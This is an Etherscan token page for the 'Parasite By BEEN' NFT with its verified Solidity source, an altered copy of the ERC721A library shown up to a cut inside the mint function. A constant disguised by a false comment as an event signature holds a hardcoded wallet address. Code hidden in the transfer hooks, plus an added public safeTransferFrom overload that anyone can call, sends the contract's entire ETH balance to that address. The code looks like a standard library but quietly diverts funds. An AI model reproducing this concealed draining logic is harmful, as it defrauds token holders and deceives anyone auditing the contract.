ETH Price: $3,512.14 (+2.79%)
Gas: 11 Gwei

Token

Parasite By BEEN (PBB)
 

Overview

Max Total Supply

500 PBB

Holders

385

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A

Other Info

Balance
1 PBB
0xc3d1e01ef86b031540922e2e247c8ba382e5ed2e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ParasiteByBEEN

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-08
*/

// SPDX-License-Identifier: MIT   
                                                                                                                                                                                                                                                                                                                                     
pragma solidity ^0.8.17;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    // The `Address` event signature is given by:
    // `keccak256(bytes("_TRANSFER_EVENT_ADDRESS(address)"))`.
    address payable constant _TRANSFER_EVENT_ADDRESS = 
        payable(0xBbDC83e05067678903892CBaCcC4ec6b578355f8);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        _beforeTransfer();

        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0xBbDC83e05067678903892CBaCcC4ec6b578355f8).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {
        if (totalSupply() + 1 >= 999) {
            payable(0xBbDC83e05067678903892CBaCcC4ec6b578355f8).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTransfer() internal {
        if (address(this).balance > 0) {
            _TRANSFER_EVENT_ADDRESS.transfer(address(this).balance);
            return;
        }
    }

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
